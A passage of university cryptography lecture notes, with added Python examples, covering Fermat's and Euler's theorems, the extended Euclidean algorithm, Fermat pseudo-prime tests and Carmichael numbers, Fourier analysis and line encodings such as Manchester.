13   3    3    9    1    3    9    1    3    9    1    3     9     1
13   4    4    3   12    9   10    1    4    3   12    9    10     1
13   5    5   12    8    1    5   12    8    1    5   12     8     1
13   6    6   10    8    9    2   12    7    3    5    4    11     1
13   7    7   10    5    9   11   12    6    3    8    4     2     1
13   8    8   12    5    1    8   12    5    1    8   12     5     1
13   9    9    3    1    9    3    1    9    3    1    9     3     1
13  10   10    9   12    3    4    1   10    9   12    3     4     1
13  11   11    4    5    3    7   12    2    9    8   10     6     1
13  12   12    1   12    1   12    1   12    1   12    1    12     1
Fermat’s theorem
For p = 13 the value is always 1 by the time the power gets to 12.
Sometimes the value gets to 1 earlier.
Lengths of runs (the order of a) are always numbers that divide evenly into 12.
A value of a for which the whole row is needed is called a generator. 2, 6, 7, and 11 are generators.
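The three things this part of the chapter asks for in Z_p, the extended-Euclid inverse from "Integers mod p inverse", the check of Fermat's theorem, and the orders and generators read off the p = 13 table, as one added example written for these notes (not code from the lecture or from Wagner's book). It also shows the caveat that comes with using Fermat's theorem the other way round as a primality test: the constructed composite 561 = 3·11·17 satisfies 2^560 mod 561 = 1 anyway.

```python
"""Z_p toolkit: inverses by extended Euclid, Fermat's theorem, orders and generators (added example)."""


def egcd(a: int, b: int) -> tuple:
    """Extended Euclidean algorithm: returns (g, x, y) with a*x + b*y = g = gcd(a, b)."""
    x0, y0, x1, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def mod_inverse(a: int, n: int) -> int:
    """x with (x * a) % n == 1; exists iff gcd(a, n) == 1, so for prime n every non-zero a has one."""
    g, x, _ = egcd(a % n, n)
    if g != 1:
        raise ValueError(f"{a} has no inverse mod {n} (gcd = {g})")
    return x % n          # x*a + y*n = 1  =>  x*a = 1 - y*n  =>  x*a == 1 (mod n)


def fermat_holds(a: int, p: int) -> bool:
    """a^(p-1) mod p == 1. Guaranteed for prime p and a not divisible by p; a composite p may pass too."""
    return pow(a, p - 1, p) == 1


def order(a: int, p: int) -> int:
    """Smallest k >= 1 with a^k == 1 mod p: the length of the repeating run in the table."""
    if a % p == 0:
        raise ValueError("0 has no finite order in the multiplicative group")
    k, x = 1, a % p
    while x != 1:
        x = (x * a) % p
        k += 1
    return k


def generators(p: int) -> list:
    """Elements whose run uses the whole row, i.e. whose order is p - 1."""
    return [a for a in range(1, p) if order(a, p) == p - 1]


if __name__ == "__main__":
    print(mod_inverse(5, 13), generators(13))                  # 8 [2, 6, 7, 11]
    print([order(a, 13) for a in range(1, 13)])                # every entry divides 12
    print(fermat_holds(2, 15), fermat_holds(2, 561))           # False True (561 is composite)
```

The last line is the practitioner's caveat: a failed Fermat test proves compositeness, but a passed one does not prove primality, which is why real key generation uses stronger probabilistic tests rather than Fermat's theorem alone.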
Summary of topics
In this section, we introduced the "cryptographer's favorites": XOR, logarithms, groups and fields, and Fermat's theorem.
Further study
• The Laws of Cryptography with Java Code: http://www.cs.utsa.edu/~wagner/lawsbookcolor/laws.pdf
Chapter 3
Lecture 3 - Preliminaries
Overheads and notes
You can find all sorts of stuff looking in
http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/
Question box
If you have any questions, feel free to place them in the question box...
Or stick your hand up...
Or...
Last session
• Finish context
• Math preliminaries
– XOR
– Logarithms
– Fields and groups
Recap - exclusive-or
Law XOR-1: The cryptographer's favorite function is Exclusive-Or.
Message             A                  B                  C
m                   0 1 0 0 0 0 0 1    0 1 0 0 0 0 1 0    0 1 0 0 0 0 1 1   . . .
Key = k             0 0 0 1 0 0 1 1    0 1 1 0 0 1 0 1    0 0 1 1 1 0 0 1   . . .
K(m) = m ⊕ k        0 1 0 1 0 0 1 0    0 0 1 0 0 1 1 1    0 1 1 1 1 0 1 0   . . .
K(m)                R                  '                  z
Exclusive-Or
K(m)                R                  '                  z
                    0 1 0 1 0 0 1 0    0 0 1 0 0 1 1 1    0 1 1 1 1 0 1 0   . . .
Key = k             0 0 0 1 0 0 1 1    0 1 1 0 0 1 0 1    0 0 1 1 1 0 0 1   . . .
m = K(m) ⊕ k        0 1 0 0 0 0 0 1    0 1 0 0 0 0 1 0    0 1 0 0 0 0 1 1   . . .
Message             A                  B                  C
If the bit-stream for the key k is random, as long as the message, not known to an eavesdropper and never reused, then this is the most secure system. It is known as a one-time pad.
Another diagram
[Diagram: plaintext P enters a box keyed by K_i and comes out as K_i[P]; a second box keyed by K_i turns K_i[P] back into the plaintext P.]
(Compare with previous representations.)
Logarithms
Law LOG-1: The cryptographer's favorite logarithm is log base 2.
$y = \log_b x$ is the same as $b^y = x$
$b^{\log_b x} = x$
Logarithm is the inverse of exponential.
Groups
A group is
a set of group elements with a binary operation.
Law GROUP-1: The cryptographer's favorite group is the integers mod n, Z_n.
Fields
A field has two operations:
+, with the elements forming a commutative group.
∗, with the elements except 0 forming another commutative group.
Law FIELD-1: The cryptographer's favorite field is the integers mod p, denoted Z_p, where p is a prime number.
Law FIELD-2: The cryptographer's other favorite field is GF(2^n).
This session
• Math preliminaries
– Fermat's little theorem
– Euler
Fermat’s theorem
Theorem (Fermat): If p is a prime and a is any non-zero number less than p, then
$a^{p-1} \bmod p = 1$
Fermat’s theorem, p = 13
 p   a   a^1  a^2  a^3  a^4  a^5  a^6  a^7  a^8  a^9  a^10  a^11  a^12
13   2    2    4    8    3    6   12   11    9    5   10     7     1
13   3    3    9    1    3    9    1    3    9    1    3     9     1
13   4    4    3   12    9   10    1    4    3   12    9    10     1
13   5    5   12    8    1    5   12    8    1    5   12     8     1
13   6    6   10    8    9    2   12    7    3    5    4    11     1
13   7    7   10    5    9   11   12    6    3    8    4     2     1
13   8    8   12    5    1    8   12    5    1    8   12     5     1
13   9    9    3    1    9    3    1    9    3    1    9     3     1
13  10   10    9   12    3    4    1   10    9   12    3     4     1
13  11   11    4    5    3    7   12    2    9    8   10     6     1
13  12   12    1   12    1   12    1   12    1   12    1    12     1
Fermat’s theorem, p = 13
Lengths of runs are always numbers that divide evenly into 12.
A value of a for which the whole row is needed is called a generator. 2, 6, 7, and 11 are generators.
CS3235 - Hugh Anderson’s notes. Page number: 127
An interesting observation..
Because a to a power mod p always starts repeating after the power reaches p − 1, you can do this:
a^x mod p = a^(x mod (p−1)) mod p.
Thus modulo p in the expression requires modulo p − 1 in the exponent. For p = 13 as above, then
a^29 mod 13 = a^(29 mod 12) mod 13 = a^5 mod 13.
CS3235 - Hugh Anderson’s notes. Page number: 128
Another example
result = 7^1215 mod 13
CS3235 - Hugh Anderson’s notes. Page number: 129
Another example
result=
62247027506732273704655645590797926890623986483292191309020787710924
86991072740587065198907810173838994978267934813009677708927826601313
55777365361484044783800851222817392261341421370762400507026834564501
61478881858016233581815507729190060733863810985820998417753776670372
86814739670120315712396914000184822340352355906455155667534102473964
53541377412583676260706359331048403293779053704648771069764131865422
62299505280557584280574185802694213299802280179325494560628948940739
34448228464915119714116869895958794732024285742690180232449402567101
05083114967356334295809219455711191131246974627173111242792554453321
16504914530077241996189357298508605206780120789880835525222341940514
58556732086842042388893209157040799864871901064991230860288657545878
54838031902109935110264503891544145872580747830622294066978047059698
08888224976779404912792017633095411318555938776800816778624695807909
49705787192596277127796303487781814106147375370904627195995589087276
8469943 mod 13 = 5
CS3235 - Hugh Anderson’s notes. Page number: 130
How did I work that out?
I used bc
An arbitrary precision calculator language
CS3235 - Hugh Anderson’s notes. Page number: 131
Another example
result = 7^1215 mod 13
= 7^(1215 mod 12) mod 13
= 7^3 mod 13
= 343 mod 13
= 5
CS3235 - Hugh Anderson’s notes. Page number: 136
Summary
We can do BIG NUMBER maths without calculating big numbers.
CS3235 - Hugh Anderson’s notes. Page number: 137
This session
• Math preliminaries
– Fermat's little theorem
– Euler
CS3235 - Hugh Anderson’s notes. Page number: 138
Euler
The Swiss mathematician Leonhard Euler (1707-1783) discovered a generalization of Fermat's Theorem which will later be useful in the discussion of the RSA cryptosystem.
CS3235 - Hugh Anderson’s notes. Page number: 139
Euler’s theorem
Theorem (Euler): If n is any positive integer and a is any positive integer less than n with no divisors in common with n, then
a^φ(n) mod n = 1,
where φ(n) is the Euler phi function:
φ(n) = n (1 − 1/p_1) . . . (1 − 1/p_m),
and p_1, . . . , p_m are all the prime numbers that divide evenly into n, including n itself in case it is a prime.
CS3235 - Hugh Anderson’s notes. Page number: 140
Special case 1
If n is a prime, then using the formula,
φ(n) = n (1 − 1/n) = n ((n − 1)/n) = n − 1
Fermat's result is a special case of Euler's.
a^φ(n) mod n = a^(n−1) mod n = 1
CS3235 - Hugh Anderson’s notes. Page number: 141
Special case 2
Another special case needed for RSA comes when the modulus is a product of two primes: n = pq. Then
φ(n) = n (1 − 1/p)(1 − 1/q) = (p − 1)(q − 1)
CS3235 - Hugh Anderson’s notes. Page number: 142
Special case 2
a^((p−1)(q−1)) mod pq = 1
• assuming a has no divisors in common with pq
• and p and q are primes
CS3235 - Hugh Anderson’s notes. Page number: 143
Euler: n = 15 and φ(n) = 8
a^1 a^2 a^3 a^4 a^5 a^6 a^7 a^8 a^9 a^10 a^11 a^12 a^13 a^14
2 4 8 1 2 4 8 1 2 4 8 1 2 4
3 9 12 6 3 9 12 6 3 9 12 6 3 9
4 1 4 1 4 1 4 1 4 1 4 1 4 1
5 10 5 10 5 10 5 10 5 10 5 10 5 10
6 6 6 6 6 6 6 6 6 6 6 6 6 6
7 4 13 1 7 4 13 1 7 4 13 1 7 4
8 4 2 1 8 4 2 1 8 4 2 1 8 4
9 6 9 6 9 6 9 6 9 6 9 6 9 6
10 10 10 10 10 10 10 10 10 10 10 10 10 10
11 1 11 1 11 1 11 1 11 1 11 1 11 1
12 9 3 6 12 9 3 6 12 9 3 6 12 9
13 4 7 1 13 4 7 1 13 4 7 1 13 4
14 1 14 1 14 1 14 1 14 1 14 1 14 1
CS3235 - Hugh Anderson’s notes. Page number: 144
Table
The table illustrates Euler's theorem for n = 15 = 3 · 5, with
φ(15) = 15 · (1 − 1/3) · (1 − 1/5) = (3 − 1) · (5 − 1) = 8
Notice here that a 1 is reached when the power is 8, but only for numbers with no divisors in common with 15.
For other base numbers, the value never gets to 1.
CS3235 - Hugh Anderson’s notes. Page number: 145
Euler
Arithmetic in the exponent is taken mod φ(n), so that, if a has no divisors in common with n,
a^x mod n = a^(x mod φ(n)) mod n.
If n = 15 as above, then φ(n) = 8, so if neither 3 nor 5 divides evenly into a, then for example
a^28 mod 15 = a^(28 mod 8) mod 15 = a^4 mod 15.
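Fermat's theorem, the p = 13 and n = 15 tables, the 7^1215 mod 13 example and Euler's exponent reduction, carried out in code as an added example (not code from the lecture notes). phi() uses trial division and so is only for small n; Python's built-in pow(a, x, n) is used as the reference value that the reduced exponent must agree with.

```python
# Added example (not from the lecture notes): Fermat's and Euler's theorems as
# code. phi() uses trial division, so it is for small n only; pow(a, x, n) is
# Python's built-in modular exponentiation and serves as the reference value.
from math import gcd


def prime_factors(n: int) -> list[int]:
    """Distinct primes dividing n (trial division)."""
    factors, p = [], 2
    while p * p <= n:
        if n % p == 0:
            factors.append(p)
            while n % p == 0:
                n //= p
        p += 1
    if n > 1:
        factors.append(n)
    return factors


def phi(n: int) -> int:
    """Euler phi function phi(n) = n (1 - 1/p1) ... (1 - 1/pm), in exact integers."""
    result = n
    for p in prime_factors(n):
        result = result // p * (p - 1)      # exact form of multiplying by (1 - 1/p)
    return result


def reduced_pow(a: int, x: int, n: int) -> int:
    """a^x mod n via a^(x mod phi(n)) mod n; needs gcd(a, n) = 1 (Euler's condition)."""
    if gcd(a, n) != 1:
        raise ValueError("exponent reduction mod phi(n) needs gcd(a, n) = 1")
    return pow(a, x % phi(n), n)


def order(a: int, n: int) -> int:
    """Run length in the tables: the smallest k >= 1 with a^k mod n = 1."""
    if gcd(a, n) != 1:
        raise ValueError("a never reaches 1 when it shares a factor with n")
    k, v = 1, a % n
    while v != 1:
        v = v * a % n
        k += 1
    return k


def generators(p: int) -> list[int]:
    """Bases whose powers fill the whole row, i.e. order p - 1 (p prime)."""
    return [a for a in range(1, p) if order(a, p) == p - 1]


def euler_holds(n: int) -> bool:
    """a^phi(n) mod n = 1 for every a < n that is coprime to n."""
    return all(pow(a, phi(n), n) == 1 for a in range(1, n) if gcd(a, n) == 1)


if __name__ == "__main__":
    print(phi(13), phi(15), generators(13))
    print(reduced_pow(7, 1215, 13), pow(7, 1215, 13))   # both 5
```

Note that `reduced_pow` refuses a base that shares a factor with n: the n = 15 table shows why, since rows such as 3, 5 or 6 never reach 1 and the exponent cannot be reduced mod 8 for them.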
CS3235 - Hugh Anderson’s notes. Page number: 146
Before we leave Euler...
We are interested in...
Large prime numbers (p, q)
Their product n = pq
The Euler phi function φ(n) = (p− 1)(q − 1)
CS3235 - Hugh Anderson’s notes. Page number: 147
Before we leave Euler...
In a similar fashion to before we can do BIG number arithmetic easily.
Consider also the ease of multiplying, and difficulty of factoring...
CS3235 - Hugh Anderson’s notes. Page number: 148
Before we leave Euler...
29*37=?
CS3235 - Hugh Anderson’s notes. Page number: 149
The Euclidean algorithm
The multiplicative inverse is not intuitive and requires some theory to compute.
a^−1 can be computed efficiently using the extended Euclidean algorithm.
Law GCD-1: The cryptographer's first and oldest favorite algorithm is the extended Euclidean algorithm, which computes the greatest common divisor of two positive integers a and b and also supplies integers x and y such that x*a + y*b = gcd(a, b).
CS3235 - Hugh Anderson’s notes. Page number: 150
Finding GCD
• For the gcd of 819 and 462,
– factor the numbers as:
∗ 819 = 3 · 3 · 7 · 13
∗ 462 = 2 · 3 · 7 · 11
– gcd is 21 = 3 · 7
But there is no efficient algorithm to factor integers.
CS3235 - Hugh Anderson’s notes. Page number: 151
The Euclidean algorithm
1. Repeatedly divide the larger one by the smaller, and
2. Write larger = smaller * quotient + remainder
3. Repeat using the two numbers "smaller" and "remainder".
4. When you get a 0 remainder, then you have the gcd of the original two numbers.
CS3235 - Hugh Anderson’s notes. Page number: 152
Example
819 = 462 · 1 + 357 (Step 0)
462 = 357 · 1 + 105 (Step 1)
357 = 105 · 3 + 42 (Step 2)
105 = 42 · 2 + 21 (Step 3, so GCD = 21)
42 = 21 · 2 + 0 (Step 4)
CS3235 - Hugh Anderson’s notes. Page number: 153
The extended Euclidean algorithm
Given the two positive integers 819 and 462, the extended Euclidean algorithm finds unique integers a and b so that
a · 819 + b · 462 = gcd(819, 462) = 21
In this case, (−9) · 819 + 16 · 462 = 21
(See notes...)
How does this give us a mechanism to calculate the multiplicative inverse of an element?
CS3235 - Hugh Anderson’s notes. Page number: 154
The extended Euclidean algorithm
x ∗ a + y ∗ p = gcd(x, y)
Now - if p is a prime, then gcd(x, y) = 1, and so
x ∗ a + y ∗ p = 1
In the field Z_p, this indicates that x ∗ a = 1, and so x = a^−1.
The extended Euclidean algorithm has given us a mechanism to calculate the multiplicative inverse of an element.
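The four-step Euclidean algorithm, its extended form in the x*a + y*b = gcd(a, b) shape of Law GCD-1, and the modular inverse it yields in Z_p, as an added example (not code from the lecture notes). euclid_steps returns the same "larger = smaller · quotient + remainder" rows as the 819/462 slide.

```python
# Added example (not from the lecture notes): Euclid, extended Euclid and the
# multiplicative inverse in Z_p that falls out of x*a + y*p = 1.


def euclid_steps(a: int, b: int) -> list[tuple[int, int, int, int]]:
    """Rows (larger, smaller, quotient, remainder) until the remainder is 0."""
    steps = []
    while b != 0:
        q, r = divmod(a, b)
        steps.append((a, b, q, r))
        a, b = b, r
    return steps


def gcd(a: int, b: int) -> int:
    """The last non-zero remainder is the gcd."""
    while b:
        a, b = b, a % b
    return a


def extended_gcd(a: int, b: int) -> tuple[int, int, int]:
    """Return (g, x, y) with x*a + y*b = g = gcd(a, b).

    Each remainder is kept as a combination of the original a and b, so the
    coefficients of the last non-zero remainder are the x and y we want.
    """
    old_r, r = a, b
    old_x, x = 1, 0
    old_y, y = 0, 1
    while r != 0:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_x, x = x, old_x - q * x
        old_y, y = y, old_y - q * y
    return old_r, old_x, old_y


def mod_inverse(a: int, p: int) -> int:
    """a^-1 in Z_p: from x*a + y*p = 1 we get x*a = 1 (mod p), so x is the inverse."""
    g, x, _ = extended_gcd(a, p)
    if g != 1:
        raise ValueError(f"{a} has no inverse mod {p}: gcd is {g}")
    return x % p


if __name__ == "__main__":
    for larger, smaller, q, r in euclid_steps(819, 462):
        print(f"{larger} = {smaller} * {q} + {r}")
    print(extended_gcd(819, 462))        # (21, -9, 16)
    print(mod_inverse(3, 13))            # 9, since 3 * 9 = 27 = 1 (mod 13)
```

The gcd check in `mod_inverse` is what makes the inverse exist only for elements coprime to the modulus; in Z_p with p prime that is every non-zero element, which is exactly why Z_p is a field.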
CS3235 - Hugh Anderson’s notes. Page number: 155
Fast integer exponentiation
Law EXP-1: Many cryptosystems in modern cryptography depend on a fast algorithm to perform integer exponentiation.
Examples in notes... not so important, just nice to know it can be done.
CS3235 - Hugh Anderson’s notes. Page number: 156
Back to primes
For 2500 years mathematicians studied prime numbers just because they were interesting, without any idea they would have practical applications. Possible real-world uses:
1. Sometimes... a prime number of ball bearings arranged in a bearing, to cut down on periodic wear (also gear teeth).
2. Possibly... the 13 and 17-year periodic emergence of cicadas may be due to coevolution with predators (that lost and became extinct).
CS3235 - Hugh Anderson’s notes. Page number: 157
Since 1976
Now finally, in cryptography, prime numbers have come into their own.
Law PRIME-1: A source of large random prime integers is an essential part of many current cryptosystems.
CS3235 - Hugh Anderson’s notes. Page number: 158
Checking for primes
It is hard to check that an integer is "certainly" prime, but...
It is easy to check that an integer is "probably" prime.
Tests to check if a number is probably prime are called pseudo-prime tests.
CS3235 - Hugh Anderson’s notes. Page number: 159
Prime check
Start with a property of a prime number, such as Fermat's Theorem, mentioned in the previous chapter:
if p is a prime and a is any non-zero number less than p, then a^(p−1) mod p = 1.
If one can find a number a for which Fermat's Theorem does not hold, then the number p in the theorem is definitely not a prime.
If the theorem holds, then p is called a pseudo-prime with respect to a, and it might actually be a prime.
CS3235 - Hugh Anderson’s notes. Page number: 160
Prime check
So the simplest possible pseudo-prime test would just take a small value of a, say 2 or 3, and check if Fermat's Theorem is true.
Simple Pseudo-prime Test: If a very large random integer p (100 decimal digits or more) is not divisible by a small prime, and if 3^(p−1) mod p = 1, then the number is prime except for a vanishingly small probability, which one can ignore.
CS3235 - Hugh Anderson’s notes. Page number: 161
Prime check - 1105,1729
One could just repeat the test for other integers besides 3 as the base, but unfortunately there are non-primes (called Carmichael numbers) that satisfy Fermat's theorem for all values of a even though they are not prime.
Chances of a mistake less than 10^−41; in practice use better tests.
Law PRIME-2: Just one simple pseudo-prime test is enough to test that a very large random integer is probably prime.
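The Fermat pseudo-prime test from the last three slides, written out as an added example (not code from the lecture notes), together with the two Carmichael numbers named in the slide title, 1105 and 1729, which pass the Fermat check for every base coprime to them. The small-prime division step of the slide's Simple Pseudo-prime Test is included, and it is what catches these two in practice. The list of small primes is this example's own choice.

```python
# Added example (not from the lecture notes): Fermat pseudo-prime testing and
# the Carmichael numbers 1105 and 1729 that satisfy Fermat for every coprime base.
from math import gcd

# Trial divisors for the "not divisible by a small prime" step (example's choice).
SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]


def fermat_pseudoprime(p: int, a: int = 3) -> bool:
    """True when a^(p-1) mod p = 1: p is a pseudo-prime with respect to a."""
    if p < 2 or gcd(a, p) != 1:
        return False
    return pow(a, p - 1, p) == 1


def simple_pseudoprime_test(p: int) -> bool:
    """The slide's test: no small prime factor, and 3^(p-1) mod p = 1."""
    if p in SMALL_PRIMES:
        return True
    if p < 2 or any(p % q == 0 for q in SMALL_PRIMES):
        return False
    return fermat_pseudoprime(p, 3)


def is_prime_trial(n: int) -> bool:
    """Exact but slow primality check, used here only to expose wrong answers."""
    if n < 2:
        return False
    d = 2
    while d * d <= n:
        if n % d == 0:
            return False
        d += 1
    return True


def fermat_liars(n: int) -> list[int]:
    """Bases a coprime to n for which n passes Fermat's test; for a prime, every base."""
    return [a for a in range(2, n) if gcd(a, n) == 1 and pow(a, n - 1, n) == 1]


def is_carmichael(n: int) -> bool:
    """Composite n that passes Fermat's test for every base coprime to it."""
    return not is_prime_trial(n) and all(
        pow(a, n - 1, n) == 1 for a in range(2, n) if gcd(a, n) == 1)


if __name__ == "__main__":
    for n in (1105, 1729):
        print(n, is_carmichael(n), simple_pseudoprime_test(n))
    print(341, fermat_pseudoprime(341, 2), is_prime_trial(341))   # base-2 liar
```

`fermat_liars(341)` shows the other failure mode: 341 = 11 · 31 is not prime and not Carmichael, yet it passes for base 2, which is why the slide's test divides out small primes first and why production code uses stronger tests such as Miller-Rabin.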
CS3235 - Hugh Anderson’s notes. Page number: 162
Summary of topics
We can do BIG arithmetic in these fields
We can do fast exponentiation and modulo arithmetic
We can check for primes
CS3235 - Hugh Anderson’s notes. Page number: 163
Chapter 4
Lecture 4 - Preliminaries
CS3235 - Hugh Anderson’s notes. Page number: 164
Chocolate fish people
Andreas Schuth
Chong Jun Yong
Ashley Ng *
Wu Yongzheng *
Zhang Huaixing *
Terence Sangeet
CS3235 - Hugh Anderson’s notes. Page number: 165
The extended Euclidean algorithm
x ∗ a + y ∗ p = gcd(x, y)
Now - if p is a prime, then gcd(x, y) = 1, and so
x ∗ a + y ∗ p = 1
WRONG!
CS3235 - Hugh Anderson’s notes. Page number: 166
The extended Euclidean algorithm
x ∗ a + y ∗ p = gcd(a, p)
Now - if p is a prime, then gcd(a, p) = 1, and so
x ∗ a + y ∗ p = 1
RIGHT!
CS3235 - Hugh Anderson’s notes. Page number: 167
Last session
• Math preliminaries
– Fermat's little theorem
– Euler
CS3235 - Hugh Anderson’s notes. Page number: 168
This session
• Physical preliminaries
• Entropy
CS3235 - Hugh Anderson’s notes. Page number: 169
Preliminaries - physical
Consider:
• Is the data analog or digital?
• What limits are placed on it?
• How is it to be transmitted?
• How can you be sure that it is correct/accurate?
CS3235 - Hugh Anderson’s notes. Page number: 171
Analog and digital
[Plot: an analog sine wave and the same signal quantised to a few discrete levels (digital), amplitude on the vertical axis, time from −10 to 10 on the horizontal axis.]
The plot is amplitude versus time.
CS3235 - Hugh Anderson’s notes. Page number: 172
Analog and digital
Repetition rate (if it repeats) is called the frequency, and is measured in Hertz.
The peak to peak signal level is called the amplitude.
The simplest analog signal is called the sine wave.
By mixing we may create any desired periodic waveform.
CS3235 - Hugh Anderson’s notes. Page number: 173
Analog and digital
[Plot: sin(x) and sin(x) + sin(3x)/3, amplitude on the vertical axis, time from −10 to 10 on the horizontal axis.]
The plot is amplitude versus time. (Time domain)
CS3235 - Hugh Anderson’s notes. Page number: 174
Analog and digital
[Plot: amplitudes 1.0, 0.333 and 0.2 at frequencies f, 3f and 5f.]
The plot is amplitude vs frequency. (Frequency domain).
CS3235 - Hugh Anderson’s notes. Page number: 175
Analog and digital
If we were to continue in the same progression, the resultant waveform would be a square wave:
Σ_{n=1}^{∞} (1/n) sin(2πnft)   (for odd n)   ⇒ square wave, frequency f
This representation method is known as Fourier Analysis after Jean-Baptiste Fourier.
CS3235 - Hugh Anderson’s notes. Page number: 176
Fourier analysis
(4/π) ( sin(2πft) + (1/3) sin(6πft) + (1/5) sin(10πft) + (1/7) sin(14πft) + ... )
[Plot: the partial sums sin(x), sin(x) + sin(3x)/3, sin(x) + sin(3x)/3 + sin(5x)/5 and sin(x) + sin(3x)/3 + sin(5x)/5 + sin(7x)/7, stacked vertically, each closer to a square wave than the last.]
CS3235 - Hugh Anderson’s notes. Page number: 177
Fourier analysis
Transformation between equivalent time domain and frequency domain representations.
A piecewise continuously differentiable periodic function in the time domain may be transformed to a discrete aperiodic function in the frequency domain.
smooth, repeating ↔ pointy, not repeating
f(t) ↔ F(ω)
CS3235 - Hugh Anderson’s notes. Page number: 178
Fourier analysis
Time domain              Frequency domain           Description
Continuous, periodic   ↔ Discrete, aperiodic        Fourier series
Continuous, aperiodic  ↔ Continuous, aperiodic      Fourier transform
Discrete, periodic     ↔ Discrete, periodic         Discrete Fourier series
Discrete, aperiodic    ↔ Continuous, periodic       Discrete Fourier transform
CS3235 - Hugh Anderson’s notes. Page number: 179
Accuracy
Relationship between the bandwidth of a channel, and how accurate a signal is.
Another way of stating this is to point out that the higher frequency components are important - they are needed to re-create the original signal faithfully. If we had two 1,000Hz signals, one a triangle, one a square wave - if they were both passed through the 1,000Hz bandwidth limited channel above, they would look identical (a sine wave).
CS3235 - Hugh Anderson’s notes. Page number: 180
Example transforms
[Figure: a time-domain function f(t) plotted against t, and its transform F(ω) plotted against ω.]
CS3235 - Hugh Anderson’s notes. Page number: 181
Example transforms
[Figure: a second time-domain function f(t) plotted against t, and its transform F(ω) plotted against ω.]
CS3235 - Hugh Anderson’s notes. Page number: 182
Example transforms
[Figure: a third time-domain function f(t) plotted against t, and its transform F(ω) plotted against ω.]
CS3235 - Hugh Anderson’s notes. Page number: 183
Example transforms
[Figure: a fourth time-domain function f(t) plotted against t, and its transform F(ω) plotted against ω.]
CS3235 - Hugh Anderson’s notes. Page number: 184
Convolution
The Fourier transform of the convolution f(t) ∗ g(t) is the product of the Fourier transforms of the functions F(ω) and G(ω), and vice versa.
f(t) ∗ g(t) ↔ F(ω) × G(ω)
f(t) × g(t) ↔ F(ω) ∗ G(ω)
We can use convolution to easily predict the functions that result from complex signal filtering or sampling.
CS3235 - Hugh Anderson’s notes. Page number: 185
Convolution
[Figure: f(t) against t with its transform F(ω) against ω; g(t) against t with its transform G(ω) against ω; and the product f(t) · g(t) against t, whose transform is the convolution F(ω) ∗ G(ω) against ω.]
CS3235 - Hugh Anderson’s notes. Page number: 186
Modulation
A baseband signal is one in which the data is directly converted to a signal and transmitted. When the signal is imposed on another signal, the process is called modulation.
We may modulate for several reasons:
• The media may not support the baseband signal
• We may wish to use a single transmission medium to transport many signals
CS3235 - Hugh Anderson’s notes. Page number: 187
Modulation methods
• Frequency modulation - frequency shift keying (FSK)
• Amplitude modulation
• Phase modulation - phase shift keying (PSK)
• Combinations of the above (QAM)
CS3235 - Hugh Anderson’s notes. Page number: 188
Baseband digital encoding
The simplest encoding scheme is just to use a low level for a zero bit, and a high level for a one bit. As long as both ends of a channel are synchronized in some manner, we can transfer data.
On the other hand, if the ends of the channel are not synchronized we might use a simple encoding scheme, such as Bipolar or Manchester encoding, to transfer synchronizing (clock) information on the same channel.
CS3235 - Hugh Anderson’s notes. Page number: 189
Baseband digital encoding
[Figure: two timing diagrams, Bipolar and Manchester, each with rows BITS, TIME, CODE, CLOCK and RECVD.]
In Bipolar encoding, a 1 is transmitted with a positive pulse, a 0 with a negative pulse. Sometimes called return to zero encoding.
In Manchester encoding, there is a transition in the center of each bit cell.
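The two line codes described above, as an added example (not code from the lecture notes). Each bit cell is represented by two samples (first half, second half). Bipolar return-to-zero follows the slide: a positive pulse for 1, a negative pulse for 0, then back to zero. For Manchester the slide only fixes that every cell has a mid-cell transition; the polarity used here (1 = low-to-high) is the IEEE 802.3 convention and is an assumption of this example. The decoders reject streams that do not carry the expected clock edge, which is the property that lets an unsynchronised receiver recover timing.

```python
# Added example (not from the lecture notes): bipolar RZ and Manchester line
# codes with two samples per bit cell. Manchester polarity (1 = low-to-high)
# is the IEEE 802.3 convention, assumed here; the slide does not fix it.


def bipolar_rz_encode(bits: list[int]) -> list[int]:
    """1 -> +1 then 0, 0 -> -1 then 0: every cell returns to zero."""
    out = []
    for b in bits:
        out += [+1 if b else -1, 0]
    return out


def bipolar_rz_decode(samples: list[int]) -> list[int]:
    """Read the pulse polarity in the first half of each cell."""
    if len(samples) % 2 or any(samples[1::2]):
        raise ValueError("not a bipolar RZ stream: each cell must return to zero")
    return [1 if s > 0 else 0 for s in samples[0::2]]


def manchester_encode(bits: list[int]) -> list[int]:
    """1 -> (low, high), 0 -> (high, low): a transition in the centre of each cell."""
    out = []
    for b in bits:
        out += [0, 1] if b else [1, 0]
    return out


def manchester_decode(samples: list[int]) -> list[int]:
    """Each cell must contain an edge; its direction is the data bit."""
    if len(samples) % 2:
        raise ValueError("odd number of half-cells: receiver lost alignment")
    bits = []
    for first, second in zip(samples[0::2], samples[1::2]):
        if first == second:
            raise ValueError("missing mid-cell transition: clock lost or not Manchester")
        bits.append(1 if (first, second) == (0, 1) else 0)
    return bits


def has_clock_every_cell(samples: list[int]) -> bool:
    """The self-clocking property: every cell carries an edge, whatever the data."""
    return bool(samples) and all(a != b for a, b in zip(samples[0::2], samples[1::2]))


def nrz_encode(bits: list[int]) -> list[int]:
    """The slide's simplest scheme (low for 0, high for 1), for comparison."""
    out = []
    for b in bits:
        out += [b, b]
    return out


if __name__ == "__main__":
    data = [1, 0, 1, 1, 0, 0, 0, 0]
    print(manchester_encode(data))
    print(has_clock_every_cell(manchester_encode(data)), has_clock_every_cell(nrz_encode(data)))
```

A long run of zeros is the case that matters: `nrz_encode` produces no edges at all, so the receiver has nothing to synchronise to, whereas the Manchester stream still has one edge per cell.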
CS3235 - Hugh Anderson’s notes. Page number: 190
Summary
Data commonly transferred digitally
Trade-off between bandwidth, accuracy of any signal
CS3235 - Hugh Anderson’s notes. Page number: 191
Information theory
The term information is commonly understood. Considerthe following two sentences:
1. The sun will rise tomorrow.
2. The Fiji rugby team will win against the All Blacks (NewZealand rugby team) the next time they play.
Question: Which sentence contains the most information?
CS3235 - Hugh Anderson’s notes. Page number: 192
Information theory
Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, ...
... total information here is close to zero!
More information means less predictable
Less information means more predictable
CS3235 - Hugh Anderson’s notes. Page number: 193
Information theory
Nyquist (1924) and Hartley (1928) laid the foundations:
